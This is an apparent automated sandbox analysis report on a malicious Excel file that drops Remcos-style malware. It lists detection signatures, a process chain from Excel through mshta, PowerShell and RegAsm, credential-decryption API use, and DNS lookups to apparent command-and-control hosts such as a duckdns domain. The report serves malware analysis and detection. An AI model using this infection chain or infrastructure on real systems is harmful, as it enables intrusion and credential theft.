                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: QPS-36477.xls, Joe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 21_2_00404423 FreeLibrary,CryptUnprotectData,21_2_00404423
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 30_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,30_2_004338C8
                    Source: powershell.exe, 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_4998d6fa-d

                    Exploits

                    Source: Yara match, File source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 30_2_00407538 _wcslen,CoGetObject,30_2_00407538
                    Source: unknown, HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknown, HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.2
                    Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdb source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdbhP source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdbhP source: powershell.exe, 00000014.00000002.494874589.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdb source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: .pdbW source: powershell.exe, 00000007.00000002.458812046.000000001C370000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,30_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,30_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,30_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00407877 FindFirstFileW,FindNextFileW,30_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0044E8F9 FindFirstFileExA,30_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,30_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,30_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 30_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,30_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                    Software Vulnerabilities

                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
                    Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global traffic DNS query: name: wrath.me
                    Source: global traffic DNS query: name: ia600102.us.archive.org
                    Source: global traffic DNS query: name: idabo.duckdns.org
                    Source: global traffic DNS query: name: geoplugin.net
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 207.241.227.242:443
